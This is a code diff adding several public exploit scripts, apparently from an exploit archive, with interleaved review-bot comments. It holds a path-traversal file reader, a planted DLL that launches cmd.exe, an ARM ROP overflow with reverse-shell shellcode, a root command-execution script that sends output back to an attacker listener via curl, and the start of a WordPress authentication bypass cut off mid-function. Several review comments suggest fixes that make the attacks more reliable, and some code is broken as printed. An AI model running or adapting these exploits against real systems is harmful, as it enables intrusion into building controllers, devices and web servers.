diff --git a/exploits/java/webapps/52304.py b/exploits/java/webapps/52304.py
new file mode 100755
index 000000000..f60cbd628
--- /dev/null
+++ b/exploits/java/webapps/52304.py
@@ -0,0 +1,57 @@ +# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read +# Google Dork: +# Date: 23/May/2025 +# Exploit Author: d3sca +# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase +# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase +# Version: [app version] 1.1 +# Tested on: Debian Linux +# CVE : CVE-2025-46822 + +#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd + +import argparse +import requests + +from urllib.parse import quote +def exploit(target, file_path, output=None): + # Ensure the file path is absolute + if not file_path.startswith('/'): + print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.") + file_path = '/' + file_path.lstrip('/') + + # URL-encode the file path + encoded_path = quote(file_path, safe='') + + # Construct the target URL + endpoint = f"/api/v1/files/{encoded_path}" + url = target.rstrip('/') + endpoint + print(f"[*] Attempting to retrieve: {file_path}") + print(f"[*] Sending request to: {url}") + try: + response = requests.get(url, allow_redirects=False, timeout=10) + + if response.status_code == 200: + print("[+] File retrieved successfully!") + if output: + with open(output, 'wb') as f: + f.write(response.content) + print(f"[+] Content saved to: {output}") + else: + print("\nFile contents:") + print(response.text) + else: + print(f"[-] Failed to retrieve file. 
Status code: {response.status_code}") + print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response + except Exception as e: + print(f"[-] An error occurred: {str(e)}") + +if name == "main": + parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API") + parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)") + parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)") + parser.add_argument("-o", "--output", help="Output file to save contents") + + args = parser.parse_args() + + exploit(args.target, args.file_path, args.output) \ No newline at end of file diff --git a/exploits/multiple/local/52306.txt b/exploits/multiple/local/52306.txt new file mode 100644 index 000000000..d998d9558 --- /dev/null +++ b/exploits/multiple/local/52306.txt 
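Review bot: The entry guard at the end of this hunk reads `if name == "main":`, which as written raises `NameError` (`name` is never defined) before `exploit()` is ever reached; it should be `if __name__ == "__main__":` — if the bare words are an artifact of how the diff was rendered rather than the published file, that should be confirmed against the raw file. Independently, the success test is `response.status_code == 200` alone, so a 200 error page, login form or HTML wrapper would be printed as "File retrieved successfully!"; checking a content marker for the requested file (e.g. `root:` for `/etc/passwd`) or at least printing `response.headers.get("Content-Type")` alongside the body would make the result trustworthy. The `quote(file_path, safe='')` call is what turns `/etc/passwd` into `%2Fetc%2Fpasswd` inside the `/api/v1/files/` path segment, so it deserves a comment such as `# safe='' encodes '/' as %2F so the whole absolute path survives as one path segment — this is the traversal primitive, not a cosmetic step`. The usage line also names the script `cve-2025-46822.py` while the file is published as `52304.py`.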
@@ -0,0 +1,111 @@ +# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: <=3.08.03 +# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7 +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience + +# Advisory ID: ZSL-2025-5952 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php + +# CVE ID: CVE-2024-13946 +# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946 + +C:\> type project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll +C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat +REM 64bit parameters +jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. 
-DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + +C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat + +C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters + +C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + + +C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class +... +... +System.loadLibrary("CylonLicence"); +} catch (Throwable t) {} +LoggerUtil.logger.error("Error loading license DLL", t); +} +} +... +... 
+ +C:\Aspect\Aspect-Studio-3.08.03> cd logs +C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log + +ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main] +java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path + at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867) + at java.lang.Runtime.loadLibrary0(Runtime.java:870) + at java.lang.System.loadLibrary(System.java:1122) + at com.aamatrix.util.AspectStudio.(AspectStudio.java:42) + at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34) + at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52) + at java.lang.Class.forName0(Native Method) + at java.lang.Class.forName(Class.java:348) + at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70) + ... + ... + +C:\DLL-Mala> type CylonLicence.cpp + +#define WIN32_LEAN_AND_MEAN +#include +#include + + +extern "C" __declspec(dllexport) +DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) { + ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL); + return 0; +} + +extern "C" __declspec(dllexport) +BOOL APIENTRY DllMain(HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved) { + switch (ul_reason_for_call) { + case DLL_PROCESS_ATTACH: + CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} \ No newline at end of file diff --git a/exploits/multiple/remote/52303.py b/exploits/multiple/remote/52303.py new file mode 100755 index 000000000..4ba4c6c12 --- /dev/null +++ b/exploits/multiple/remote/52303.py 
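Review bot: The advisory never states what privilege the planting step needs: the demo just runs `del CylonLicence.dll` in `C:\Aspect\Aspect-Studio-3.08.03`, so exploitability hinges on whether that install directory is writable by a user other than the one launching Aspect Studio, and the writeup should record the ACL it was tested against. Because aspect.bat passes `-Djava.library.path=.`, the native library search path is the process's working directory rather than a fixed install path, so a DLL planted in whatever directory aspect.bat is started from is also picked up — worth one sentence, since it widens the attack surface beyond the install folder. The decompiled `AspectStudio.class` excerpt shows `System.loadLibrary("CylonLicence")` wrapped in `catch (Throwable t)` with only a logger call, which is why a missing or swapped DLL is never fatal and a planted one runs silently; the log excerpt confirms that path is taken. The two `#include` lines in `CylonLicence.cpp` have lost their header names (presumably `<windows.h>` and `<shellapi.h>` given `ShellExecuteW` and `SW_SHOWNORMAL`) and the PoC will not compile as printed.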
@@ -0,0 +1,247 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow +# Google Dork: [if applicable] +# Date: 2025-05-23 +# Exploit Author: Pepelux (user in ExploitDB) +# Vendor Homepage: https://www.grandstream.com/ +# Software Link: [download link if available] +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2070 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +Terminal 1: +$ ncat -lnvp 4444 + +Terminal 2: +$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444 +""" + +from operator import ge +import sys +import time +from pwn import * + +import argparse + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-ti', '--target_ip', type=str, required=True, + help='device IP address', dest="device_ip") + parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081, + help='device port', dest="device_port") + parser.add_argument('-ri', '--reverse_ip', type=str, required=True, + help='reverse IP address', dest="reverse_ip") + parser.add_argument('-rp', '--reverse_port', type=int, required=True, + help='reverse port', dest="reverse_port") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + TI = args.device_ip + TP = args.device_port + RI = args.reverse_ip + RP = args.reverse_port + + return TI, TP, RI, RP + except ValueError: + exit() + + +def check_badchars(data): + for i in range(len(data)): + if data[i] in [0x0, 0x40]: + log.warn("Badchar %s detected at %#x" % (hex(data[i]), i)) + return True + return False + + +def get_shellcode(ip, port): + ip_bytes = socket.inet_aton(ip) + port_bytes = struct.pack(">H", port) + + # Linux ARM reverse shell + + # switch to thumb mode + sc = b"\x01\x30\x8F\xE2" # add r3, pc, 
#1 + sc += b"\x13\xFF\x2F\xE1" # bx r3 + + # socket(2, 1, 0) + sc += b"\x02\x20" # movs r0, #2 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\xC8\x27" # movs r7, #0xc8 + sc += b"\x51\x37" # adds r7, #0x51 + sc += b"\x01\xDF" # svc #1 + sc += b"\x04\x1C" # adds r4, r0, #0 + + # connect(r0, &sockaddr, 16) + sc += b"\x0C\xA1" # adr r1, #0x30 + sc += b"\x4A\x70" # strb r2, [r1, #1] + sc += b"\x10\x22" # movs r2, #0x10 + sc += b"\x02\x37" # adds r7, #2 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 0) + sc += b"\x3F\x27" # movs r7, #0x3f + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 1) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 2) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x02\x21" # movs r1, #2 + sc += b"\x01\xDF" # svc #1 + + # execve("/bin/sh") + sc += b"\x06\xA0" # adr r0, #0x18 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\x91" # str r1, [sp, #4] + sc += b"\x02\x91" # str r1, [sp, #8] + sc += b"\x01\x90" # str r0, [sp, #4] + sc += b"\x01\xA9" # add r1, sp, #4 + sc += b"\xC2\x71" # strb r2, [r0, #7] + sc += b"\x0B\x27" # movs r7, #0xb + sc += b"\x01\xDF" # svc #1 + + sc += b"\x02\xFF" + sc += port_bytes + sc += ip_bytes + sc += b"/bin/shX" + + return sc + + +def main(): + ti, tp, ri, rp = get_args() + + # ROP Gadgets + + libc_base = 0x76ec1000 + + mprotect = libc_base + 0x93510+1 + pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc} + pop_pc = libc_base + 0xd7515 # pop {pc} + pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc} + + pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc} + add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5 + # 0x0002f83c (0x0002f83d): mov r0, r1; bx lr + mov_r0_r1 = libc_base + 0x0002f83d + # 0x0006a086 (0x0006a087): pop {r1, pc} + pop_r1 = 
libc_base + 0x6a087 + ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr + # 0x000a3a42 : movs r4, r0 ; pop {r1, pc} + mov_r4_r0 = libc_base + 0x000a3a42+1 + # 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr + movs_r1_r0 = libc_base + 0x0001fdaf + + and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr + movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr + mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr + blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp + + shellcode = get_shellcode(ri, rp) + + auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @" + junk = p32(0x43434343) + + payload = auth_command + payload += b"A" * 144 + + # The goal is that R0 -> SP + + # R5 = pop {pc} + # because in the the next gadget we have a blx r5 + payload += p32(pop_r5) + payload += p32(pop_pc) # R5 = pop {pc} + + # R1 = SP ; BLX pop {pc} + payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5 + + # Restore LR register (because it has been updated by the last BLX gadget) + payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc} + payload += junk*4 # r0, r4, r8, ip + payload += p32(pop_pc) # LR = pop {pc} + + # R0 = stack address + payload += p32(mov_r0_r1) # mov r0, r1; bx lr + + # R1 = mask page align + payload += p32(pop_r1) # pop {r1, pc} + payload += p32(0xfffe1001) + + # R0 = stack address & 0xfffe1001 + payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr + # R4 = R0 + payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr + payload += junk # r1 + + # mprotect params + # r0 = shellcode page aligned address + # r1 = size(ofshellcode) + # r2 = protection (0x7 – RWX) + + # R2 = 0x7 + payload += p32(pop_r0) + payload += p32(0x07070707) + payload += p32(and_r0_f) # R0 = 7 (RWX) + payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX) + + # R1 = length = 0x10101010 (avoid 0's) + payload += p32(pop_r0) + payload += p32(0x01010101) + payload += p32(movs_r1_r0) # r1 (length: 0x10101010) + + # R0 = stack address 4k 
aligned + payload += p32(mov_r0_r4) + + # mprotect(stack, 0x10101010, 0x7) + payload += p32(mprotect) + payload += p32(blx_sp) # ejecutamos en pila + payload += shellcode # shellcode + + if check_badchars(payload[len(auth_command):]): + sys.exit(0) + + log.info("Device IP: %s:%d" % (ti, tp)) + log.info("Attacker IP: %s:%d" % (ri, rp)) + log.info("Payload len: %d" % len(payload)) + + count = 1 + + while True: + try: + print('Try: %d' % count) + r = remote(ti, tp) + r.send(payload) + log.success("Payload sent!") + # r.close() + time.sleep(1) + count += 1 + except: + sleep(3) + pass + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52305.py b/exploits/multiple/remote/52305.py new file mode 100755 index 000000000..829ff225e --- /dev/null +++ b/exploits/multiple/remote/52305.py 
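Review bot: The delivery loop at the end of `main()` wraps `remote(ti, tp)`/`r.send(payload)` in a bare `except:`, which also catches `KeyboardInterrupt`, so once the `while True` loop is running Ctrl-C cannot stop it and the `sleep(3)` path just keeps retrying; narrow it to `except KeyboardInterrupt: break` followed by `except Exception: sleep(3)`. Each iteration also opens a fresh connection while `r.close()` is commented out, so sockets accumulate until the process exits; close the tube after the `time.sleep(1)`. The chain hard-codes `libc_base = 0x76ec1000` and every gadget is an offset from it, so the exploit only works when the device's libc is mapped at that address — the header should say which firmware image the base was taken from and whether the endless retry loop is there to brute-force a varying base or only to ride out service restarts (the script does not say). The module docstring's usage line reads `python 3 CVE-2020-2070.py` while the file targets CVE-2022-2070 (and the command should be `python3`); `from operator import ge` is unused and `default=8081` on a `required=True` argument is dead.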
@@ -0,0 +1,281 @@ +#!/usr/bin/env python +# +# +# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation +# +# +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio +# Firmware: <=3.08.03 +# +# Summary: ASPECT is an award-winning scalable building energy management +# and control solution designed to allow users seamless access to their +# building data through standard building protocols including smart devices. +# +# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo +# misconfiguration flaws. An authenticated remote code execution vulnerability +# in the firmware update mechanism allows an attacker with valid credentials to +# escalate privileges and execute commands as root. The process involves uploading +# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved +# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages +# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation +# checks and execute arbitrary code, leading to full system compromise and unauthorized +# root access. +# +# --------------------------------------------------------------------------------- +# +# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest +# [o] Exploit starting at 21.05.2025 12:33:47 +# [o] Using credentials: guest:***** +# [o] Auth successfull. +# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688 +# [o] Listening on 192.168.73.9:5555... +# [o] Building name: ["Tower 3"] +# [o] runtime.ver=v3.08.03 +# [+] -> [virtual] rootshell +# +# # id +# uid=0(root) gid=0(root) groups=0(root) +# # pwd +# /home/MIX_CMIX/htmlroot +# exit +# [o] Removing callback file. +# [!] Connection terminated. 
+# +# --------------------------------------------------------------------------------- +# +# +# Tested on: GNU/Linux 3.15.10 (armv7l) +# GNU/Linux 3.10.0 (x86_64) +# GNU/Linux 2.6.32 (x86_64) +# Intel(R) Atom(TM) Processor E3930 @ 1.30GHz +# Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz +# PHP/7.3.11 +# PHP/5.6.30 +# PHP/5.4.16 +# PHP/4.4.8 +# PHP/5.3.3 +# AspectFT Automation Application Server +# lighttpd/1.4.32 +# lighttpd/1.4.18 +# Apache/2.2.15 (CentOS) +# OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) +# OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2025-5947 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php +# +# +# 21.04.2024 +# +# + +from colorama import init, Fore +from urllib.parse import quote +from time import sleep +import threading +import datetime +import requests +import socket +import re +import os +import sys + +init() + +def safe(*trigger, ): + return True + +def auth(target_ip, user, pwd): + login_ep = f"http://{target_ip}/validate/login.php" + payload = { + 'f_user' : user, # 'aamuser, guest' + 'f_pass' : pwd, # 'default, guest' + 'submit' : 'Login' + } + sess = requests.Session() + r = sess.post(login_ep, data=payload) + if r.status_code == 200 and 'PHPSESSID' in sess.cookies: + print("[o] Auth successfull.") + phpsessid = sess.cookies.get('PHPSESSID') + print("[o] PHPSESSID:", phpsessid) + return sess.cookies + else: + print("[!] 
Auth failed.") + return None + +def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None): + agentwho = "NetRanger/84.19" + payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555" + url = f"http://{target_ip}/projectUpdateBSXFileProcess.php" + + headers = { + "Content-Type": "multipart/form-data; boundary=----zeroscience", + "User-Agent": agentwho + } + data = ( + "------zeroscience\r\n" + f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n" + "Content-Type: application/octet-stream\r\n\r\n" + f"{payload}\r\n" + '------zeroscience--\r\n' + ) + try: + r = requests.post(url, headers=headers, data=data, cookies=cookies) + if r.status_code == 200: + url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}" + r = requests.get(url_execute, cookies=cookies) + + return r.content + + except requests.exceptions.RequestException as e: + print(f"[!] Error sending payload: {e}") + + return None + +def koj_slusha(listen_ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + s.bind(("0.0.0.0", 5555)) + s.listen(1) + + print(f"[o] Listening on {listen_ip}:5555...") + + while True: + conn, addr = s.accept() + try: + data = conn.recv(9999) + if not data: + print("[!] Connection closed by remote host.") + break + dd = data.decode("utf-8", errors="ignore") + uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL) + if uam: + print(uam.group(1), end="") + else: + print + #print(f"[o] Full response:\n{dd}") + except Exception as e: + print(f"[!] 
Error while receiving data: {e}") + finally: + conn.close() + +def main(): + if safe(True): + print("\nSafety: \033[92mON\033[0m") + exit(-17) + else: + next + + global AAM + global start + AAM = "firmware.bsx" + + start = datetime.datetime.now() + start = start.strftime("%d.%m.%Y %H:%M:%S") + title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m" + subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m" + prj = f""" + P R O J E C T\033[90m + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ +\033[0m + {title} + {subtl} + """ + if len(sys.argv) < 4: + print(prj) + print("./bsxroot.py ") + sys.exit(-0) + + target_ip = sys.argv[1] + listen_ip = sys.argv[2] + auth_arg = sys.argv[3] + + print("[o] Exploit starting at", start) + + if "--creds" in sys.argv: + creds_index = sys.argv.index("--creds") + 1 + if creds_index >= len(sys.argv): + print("[!] Error: Missing credentials after --creds.") + sys.exit(-1) + + user_pass = sys.argv[creds_index] + if ":" not in user_pass: + print("[!] Error: Invalid credentials format. 
Expected format: user:pass.") + sys.exit(-2) + + user, pwd = user_pass.split(":") + print(f"[o] Using credentials: {user}:{'*' * len(pwd)}") + cookies = auth(target_ip, user, pwd) + else: + token = auth_arg + cookies = {"PHPSESSID": token} + if not cookies: + sys.exit(-3) + + nishka = threading.Thread(target=koj_slusha, args=(listen_ip,)) + nishka.daemon = True + nishka.start() + + bacname = f"http://{target_ip}/getApplicationNamesJS.php" + r = requests.get(bacname) + if r.status_code == 200: + try: + r = r.content + decor = r.decode("utf-8") + except UnicodeDecodeError: + decor = r.decode("utf-8", errors="ignore") + + odg = re.search(r"var instanceDirectory=(.*?);", decor) + if odg: + cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'" + print("[o] Building name:", odg.group(1)) + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + print("\033[92m[+] -> [virtual] rootshell\033[0m\n") + else: + print("[o] Unknown building name.") + sleep(0.01) + + while True: + sleep(0.01) + cmd = input("# ") + if cmd.lower() in ["exit", "quit"]: + print("[o] Removing callback file.") + kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies) + print("\033[91m[!] Connection terminated.\033[0m") + os._exit(-17) + + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + + nishka.join() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52302.py b/exploits/multiple/webapps/52302.py new file mode 100755 index 000000000..20036eeb6 --- /dev/null +++ b/exploits/multiple/webapps/52302.py 
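Review bot: `auth()` declares success whenever the login POST returns 200 and the jar contains a `PHPSESSID`; a PHP application will typically issue that session cookie on the login page whether or not the credentials were accepted, so bad credentials would still print `[o] Auth successfull.` and the later `projectUpdateBSXFileProcess.php` upload would fail with no useful message — check the response body or post-login redirect for an authenticated marker instead. In `main()`, `user, pwd = user_pass.split(":")` raises `ValueError` for any password containing a colon; use `user_pass.split(":", 1)`. `koj_slusha()` binds `("0.0.0.0", 5555)` while printing `listen_ip`, so the callback port is exposed on every interface regardless of the address the user asked for; bind to `listen_ip` or say so in the message. Readers should also note that `safe()` unconditionally returns True and `main()` exits with `Safety: ON` before touching the target, so the published script is deliberately neutralised as-is, and that the cleanup command removes `/tmp/firmware.bsx` while the description says the uploaded file is moved to htmlroot — one of the two should be reconciled.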
@@ -0,0 +1,65 @@ +#!/usr/bin/env python3 +# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass +# Date: 2025-05-22 +# Exploit Author: Mohammed Idrees Banyamer +# Vendor Homepage: https://wordpress.org/plugins/user-registration/ +# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip +# Version: <= 4.1.2 +# Tested on: WordPress 6.x, Apache on Linux +# CVE: CVE-2025-2594 + +import requests +import sys +import argparse +from urllib.parse import urljoin +from termcolor import cprint, colored + +def banner(): + cprint("┌──────────────────────────────────────────────┐", "cyan") + cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan") + cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan") + cprint("│ Author: Mohammed Idrees Banyamer │", "cyan") + cprint("└──────────────────────────────────────────────┘", "cyan") + +def exploit(target_url, member_id, nonce): + endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php") + + files = { + 'action': (None, 'user_registration_membership_confirm_payment'), + 'security': (None, nonce), + 'form_response': (None, '{"auto_login": true}'), + 'member_id': (None, str(member_id)) + } + + cprint(f"[+] Target URL: {endpoint}", "yellow") + cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow") + + try: + 